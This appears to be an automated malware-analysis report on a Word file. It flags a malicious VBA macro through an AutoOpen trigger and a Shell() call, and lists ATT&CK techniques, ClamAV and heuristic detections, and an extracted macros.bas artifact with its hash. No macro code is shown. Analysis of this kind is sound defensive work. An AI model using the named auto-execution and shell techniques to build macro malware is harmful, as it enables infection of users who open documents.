Verdict: MALICIOUS (Risk Score: 202)

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic), T1204.002 (Malicious File)
This document contains a malicious VBA macro, indicated by the AutoOpen marker and a critical Shell() call. The macro is designed to execute a secondary payload, as evidenced by the obfuscated code within the 'macros.bas' script. The primary IOC is the macro file itself, which is responsible for the malicious execution.
Heuristics (6)

- ClamAV: Doc.Malware.00536d-6699021-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6699021-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 103346 bytes | db7fdf97b684dd39b5edd20671ce0d54241e152a74503c7db7c2ef7a7b7d1470 |

Preview script: first 1,000 lines of the extracted script